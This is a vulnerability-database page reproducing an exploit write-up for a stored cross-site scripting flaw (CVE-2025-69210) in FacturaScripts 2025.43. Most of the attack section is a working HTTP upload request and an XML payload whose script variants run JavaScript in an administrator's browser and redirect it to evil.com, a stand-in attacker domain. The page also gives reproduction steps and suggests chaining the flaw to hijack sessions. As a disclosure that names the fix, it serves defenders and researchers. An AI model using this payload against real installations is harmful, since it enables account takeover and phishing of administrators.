Vulners
Lucene search
📄 FacturaScripts 2025.43 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2025-69210 | 30 Dec 202522:32 | – | circl |
 | FacturaScripts 跨站脚本漏洞 | 30 Dec 202500:00 | – | cnnvd |
 | CVE-2025-69210 | 30 Dec 202519:23 | – | cve |
 | CVE-2025-69210 FacturaScripts vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 202519:23 | – | cvelist |
 | FacturaScripts 2025.43 - XSS | 29 Apr 202600:00 | – | exploitdb |
 | EUVD-2025-205844 | 30 Dec 202520:52 | – | euvd |
 | FacturaScripts is Vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 202520:52 | – | github |
 | CVE-2025-69210 | 30 Dec 202520:16 | – | nvd |
 | CVE-2025-69210 FacturaScripts vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 202519:23 | – | osv |
| GHSA-2267-XQCF-GW2M FacturaScripts is Vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 202520:52 | – | osv |
10
# Exploit Title: FacturaScripts 2025.43 - XSS
# Date: 30-12-2025
# Exploit Author: VETTRIVEL U
# Author Profile: https://www.linkedin.com/in/vettrivel2006
# Vendor Homepage: https://facturascripts.com/
# Software Link: https://github.com/NeoRazorX/facturascripts
# Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43
# Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146
# Patched Releases: https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7
# Tested on: Windows
# GitHub Advisories: https://github.com/advisories/GHSA-2267-xqcf-gw2m
# CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69210
# CVE: CVE-2025-69210
----------------------------------------------------------------------------------------
## Description
A stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality.
Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed.
Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session.
----------------------------------------------------------------------------------------
## Steps to Reproduce
1. Log in as a normal user.
2. Navigate to the Warehouse → Products section:
http://localhost:8888/ListProducto
3. Click New Product, enter the details (Example below), and save:
Product Reference: XSS POC
Description: Stored XSS PoC
4. Go to the Files section of the product.
5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite.
6. Modify the intercepted request body and inject the following payload as the uploaded XML file:
POST /EditProducto?code=10 HTTP/1.1
Host: localhost:8888
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo
Cookie: [authenticated session cookies]
------
------WebKitFormBoundaryPU65l8Am0L64rWdo
Content-Disposition: form-data; name="new-files[]"; filename="xss.xml"
Content-Type: text/xml
<html>
<head></head>
<body>
<something:script xmlns:something="
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
top.location.href = "https://evil.com";
}
</something:script>
<a:script xmlns:a="
<a:script xmlns:a="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
location.href = "https://evil.com";
}
</a:script>
<info>
<name>
<value>
<![CDATA[
<script>
alert("XSS");
if (confirm("Now Redirect POC")) {
window.location = "https://evil.com";
}
</script>
]]>
</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
------
------WebKitFormBoundaryPU65l8Am0L64rWdo--
6. Forward the request and save the product file.
7. Open the uploaded file using the generated file URL, for example:
http://localhost:8888/MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9
Observe that:
A popup with the message “XSS” is displayed.
Upon clicking OK, the browser redirects to an attacker-controlled domain.
----------------------------------------------------------------------------------------
## Impact
- Arbitrary JavaScript execution in the victim’s browser.
- Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin’s session.
- Phishing & Redirect Abuse: Attackers can redirect victims to malicious domains.
- If extended, this vulnerability could be chained with:
- Session hijacking
- CSRF token theft
- Admin API abuse
- Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization.
## Reference
https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
https://github.com/advisories/GHSA-2267-xqcf-gw2m
## Author Details:
Exploit Author: VETTRIVEL U
Author Profile: https://www.linkedin.com/in/vettrivel2006
GitHub Profile: https://github.com/vettrivel007/Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 May 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.15.4
CVSS 45.1
EPSS0.00019
SSVC